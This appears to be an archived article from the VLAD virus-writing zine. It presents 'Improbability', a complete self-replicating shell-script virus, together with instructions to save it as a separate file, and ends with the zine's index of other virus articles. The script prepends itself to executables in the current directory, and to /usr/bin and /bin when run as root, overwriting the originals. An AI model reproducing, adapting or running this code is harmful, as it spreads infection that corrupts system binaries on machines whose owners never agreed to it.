Virus Labs & Distribution
VLAD AF - Improbability


Improbability by Quantum / VLAD
-------------------------------

Below you find a prepending parasitic virus written in unix script
language.  This virus can infect any executable on any unix platform that
supports script and has the standard utils that the virus uses.  It is
important that you copy the virus into a seperate file with no trailing
or preceeding lines.  Thus I have drawn two big lines so you know where
the virus starts and ends.  When executed the virus will check to see
if it is running as root and if so it will infect the /usr/bin and /bin
dirs as well as the current directory.  Although this virus has been
thoroughly tested it most probably wont werk due to the diversity of
unix platforms.  What can I say ?  I'm sure you'll get over it.


-------------------------------------------------------------------------------
filesize=5
lines=36
thisfilesize=$filesize
if [ "`whoami`" = "root" ] ; then
ss="/usr/bin/* /bin/*"
fi
for filename in * $ss ; do
mname=`echo $filename | awk -F/ '{ print $NF }'`
if [ -x $filename ] ; then
if cp $filename /tmp/$mname.t > /dev/null 2> /dev/null ; then
if [ "`head -c 4 /tmp/$mname.t`" != "file" ] ; then
if rm -f $filename > /dev/null 2> /dev/null; then
filesize=`wc --bytes /tmp/$mname.t | awk '{print $1}'`
echo filesize=$filesize > $filename
head -$lines $0 | tail -`expr $lines - 1` >> $filename
tail -c $filesize /tmp/$mname.t >> $filename
chmod +x $filename
fi;fi;fi;fi
rm -f /tmp/$mname.t 2> /dev/null 1> /dev/null
done
mname=`echo $0 | awk -F/ '{ print $NF }'`
tname=/tmp/.$mname.t.$$
wname=/tmp/.$mname.w.$$
cp $0 $tname
echo filename=$0 > $wname
echo tname=$tname >> $wname
echo wname=$wname >> $wname
echo thisfilesize=$thisfilesize >> $wname
head -$lines $0 | tail -6 >> $wname
sh $wname $*
exit
tail -c $thisfilesize $tname > $filename
chmod +x $filename
$filename $* 
cp $tname $filename
rm -f $tname
rm -f $wname
exit
-------------------------------------------------------------------------------
- VLAD AF INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus

ARTICLE.3_1      

VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad

ARTICLE.4_1      

ARJDrop
ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

About VLAD - Links - Contact Us - Main